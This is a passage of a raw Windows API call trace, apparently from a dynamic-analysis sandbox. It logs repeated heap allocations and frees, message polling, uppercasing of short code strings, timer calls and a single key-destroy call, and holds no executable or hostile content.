wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.453] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.453] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.454] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.454] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.454] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.454] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.454] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.456] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.456] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.456] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.457] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.457] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.457] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0258.457] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.458] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0258.458] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.458] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.458] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.458] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.458] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.459] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.459] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.459] CryptDestroyKey (hKey=0xaa5820) returned 1 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0258.460] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.460] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.460] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.460] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.460] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.460] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.460] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.460] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.460] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.461] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.461] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 1 [0258.461] TranslateMessage (lpMsg=0x8beee8) returned 0 [0258.461] DispatchMessageW (lpMsg=0x8beee8) returned 0x0 [0258.461] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0258.461] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0258.461] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.462] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0258.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0258.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0258.466] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.466] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.466] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.466] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.467] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 